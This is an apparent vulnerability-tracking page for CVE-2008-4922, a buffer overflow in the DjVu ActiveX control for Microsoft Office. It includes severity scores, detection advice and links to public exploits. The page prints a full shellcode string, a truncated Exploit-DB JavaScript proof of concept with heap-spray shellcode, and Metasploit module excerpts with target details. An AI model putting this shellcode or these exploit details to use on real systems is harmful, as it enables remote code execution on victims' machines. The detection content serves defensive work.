CVE-2008-4922
published 2008-11-04CVE-2008-4922: Buffer overflow in the DjVu ActiveX Control 3.0 for Microsoft Office (DjVu_ActiveX_MSOffice.dll) allows remote attackers to execute arbitrary code via a long…
PriorityP351critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
32.75%
98.1th percentile
Buffer overflow in the DjVu ActiveX Control 3.0 for Microsoft Office (DjVu_ActiveX_MSOffice.dll) allows remote attackers to execute arbitrary code via a long (1) ImageURL property, and possibly the (2) Mode, (3) Page, or (4) Zoom properties.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C%u652E%u6578%u9000
- →Detect heap spray targeting address 0x0a0a0a0a with 4MB heap blocks; monitor JavaScript allocating large arrays of repeated NOP sleds followed by shellcode in browser context. ↗
- →Monitor instantiation of the DjVu_ActiveX_MSOffice.dll ActiveX control in browser/Office context, especially when the ImageURL property is set to an overly long string. ↗
- →The ActiveX control is not marked safe for scripting; alert on HTML pages that instantiate this control via OBJECT tags, as this is a required attack vector condition. ↗
- →Look for the shellcode NOP sled pattern %u9090%u9090 combined with large JavaScript string allocations in a loop, characteristic of heap spray delivery for this exploit. ↗
- ·The Metasploit module targets Windows XP SP0-SP3 and Windows Vista with IE 6.0 SP0-SP2 and IE 7 only; the heap spray return address 0x0A0A0A0A is hardcoded for this target set and may not apply to other platforms. ↗
- ·Payload space is limited to 1024 bytes with null bytes as bad characters; shellcode must avoid \x00. ↗
- ·EXITFUNC is set to 'process', meaning exploitation terminates the host process on exit rather than using a thread-safe exit; this affects post-exploitation stability. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DjVu - 'DjVu_ActiveX_MSOffice.dll' ActiveX Component Buffer Overflow (Metasploit)
exploitdb·2010-09-25
CVE-2008-4922 DjVu - 'DjVu_ActiveX_MSOffice.dll' ActiveX Component Buffer Overflow (Metasploit)
DjVu - 'DjVu_ActiveX_MSOffice.dll' ActiveX Component Buffer Overflow (Metasploit)
---
##
# $Id: djvu_imageurl.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an
overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)
an attacker may be able to execute arbitrary code. This control is not marked safe
for scripting,
Exploit-DB
DjVu - ActiveX Control 3.0 ImageURL Property Overflow
exploitdb·2008-10-30
CVE-2008-4922 DjVu - ActiveX Control 3.0 ImageURL Property Overflow
DjVu - ActiveX Control 3.0 ImageURL Property Overflow
---
Snoop Security Research committee
-->
// clac.exe
var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u
Metasploit
DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow
metasploit
DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow
DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow
This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.
No writeups or analysis indexed.
http://securityreason.com/securityalert/4560http://www.securityfocus.com/bid/31987http://www.vupen.com/english/advisories/2008/2956https://exchange.xforce.ibmcloud.com/vulnerabilities/46214https://www.exploit-db.com/exploits/6878http://securityreason.com/securityalert/4560http://www.securityfocus.com/bid/31987http://www.vupen.com/english/advisories/2008/2956https://exchange.xforce.ibmcloud.com/vulnerabilities/46214https://www.exploit-db.com/exploits/6878
2008-11-04
Published